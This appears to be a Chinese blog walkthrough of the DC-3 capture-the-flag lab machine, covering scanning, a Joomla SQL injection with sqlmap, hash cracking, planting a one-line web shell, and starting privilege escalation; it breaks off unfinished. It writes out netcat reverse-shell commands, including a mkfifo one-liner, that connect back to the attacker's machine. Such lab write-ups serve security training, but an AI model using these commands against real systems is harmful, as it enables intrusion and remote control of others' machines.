DC系列靶机渗透之DC-3

利用arp -scan -l扫描主机

然后利用nmap查看开放的端口,如上图所示,80端口开放,那么接下来我们可以利用这个信息进行渗透

访问一下80端口得到如上图所示的信息。

然后使用whatweb对网站进行扫描,得到如下信息,可以知道网站是利用joomla部署的,那么我们就可以利用joomscan扫描

 

利用扫描工具扫出了网站后台,我们利用浏览器登录

 如上图所示。

我们在上述扫描结果中,能够看出来使用的joomla版本,接下来我们就可以利用msf查找漏洞 

我们发现存在sql注入漏洞

根据提示的路径,我们查看文件内容

如上图所示。

 

在文件里面提示我们使用sqlmap,明确说明了使用的命令。

 

把命令复制下来,记得把主机名称改成靶机IP地址。

在这里列出了,数据库名称。

 

查看具体数据库中的表信息。

 

结果如上图所示,是joomladb数据库中,所有的表,很明显存在一个users表。

 

然后查看列名信息

 

如上图所示爆出来列名

 

然后使用命令查出了用户名和密码。

 

把hash值放入一个新建文件夹中

然后利用john工具进行解密

我出现这种情况是因为我之前解密过一次了,john工具的特点是只能解密一次,所以使用john --show hash.txt来查看之前的解密。

如果第一次使用的同学就直接用john hash.txt命令就可以得到结果。

使用得到的用户名密码进行登录,如上图所示。

接下来,我们点击尝试之后发现可以创建文件,那么我们就可以想到编写一句话木马。

 

 

我们通过访问路径看到刚才编写的一句话木马成功了。

 

然后利用蚁剑进行连接。双击打开,连接成功。kali监听,反弹shell。在kali中打开端口监听命令:nc -lvvp 2333

 

 

在蚁剑虚拟终端中nc -e /bin/bash 192.168.196.133【kali的IP地址】 2333

会有报错-e命令不能使用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.145 2333 >/tmp/f

利用虚拟终端查看信息。

 

我们发现这个用户不是管理员用户,就需要提权。

查看系统内核信息。

我们利用msf搜索漏洞。

 

然后我们使用39772

 

 

我们发现底部是一个连接,那么我们访问链接。

 

我们把下载好的文件利用蚁剑上传

 

上传了以后利用访问这个文件

 

然后解压

 

进入39772

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值